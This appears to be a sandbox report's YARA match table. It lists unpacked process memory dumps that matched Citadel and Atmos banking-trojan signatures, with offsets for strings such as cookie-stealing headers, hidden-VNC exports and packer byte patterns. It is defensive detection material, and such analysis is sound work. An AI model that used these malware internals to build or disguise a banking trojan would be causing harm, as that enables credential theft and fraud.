0.2.services.png.exe.400000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
25.3.dllhost.exe.ac0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
25.3.dllhost.exe.ac0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
25.3.dllhost.exe.ac0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
25.3.dllhost.exe.ac0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
25.3.dllhost.exe.ac0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
17.3.RuntimeBroker.exe.3d0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
17.3.RuntimeBroker.exe.3d0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
17.3.RuntimeBroker.exe.3d0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
17.3.RuntimeBroker.exe.3d0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
17.3.RuntimeBroker.exe.3d0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0.3.services.png.exe.2590000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12b39:$MZ: 4D 5A 0x140c7:$MZ: 4D 5A 0x3e608:$MZ: 4D 5A 0x3dcd4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3dd78:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2ec20:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2ec40:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3db27:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
20.3.WinStore.App.exe.a10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
20.3.WinStore.App.exe.a10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
20.3.WinStore.App.exe.a10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
20.3.WinStore.App.exe.a10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
20.3.WinStore.App.exe.a10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
22.0.SystemSettings.exe.f10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
22.0.SystemSettings.exe.f10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
22.0.SystemSettings.exe.f10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
22.0.SystemSettings.exe.f10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
22.0.SystemSettings.exe.f10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0.2.services.png.exe.2810000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0.2.services.png.exe.2810000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0.2.services.png.exe.2810000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
0.2.services.png.exe.2810000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
27.0.backgroundTaskHost.exe.e20000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
27.0.backgroundTaskHost.exe.e20000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
27.0.backgroundTaskHost.exe.e20000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
27.0.backgroundTaskHost.exe.e20000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
27.0.backgroundTaskHost.exe.e20000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
6.0.explorer.exe.c350000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
6.0.explorer.exe.c350000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
6.0.explorer.exe.c350000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
6.0.explorer.exe.c350000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
17.0.RuntimeBroker.exe.3d0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
17.0.RuntimeBroker.exe.3d0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
17.0.RuntimeBroker.exe.3d0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
17.0.RuntimeBroker.exe.3d0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
17.0.RuntimeBroker.exe.3d0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
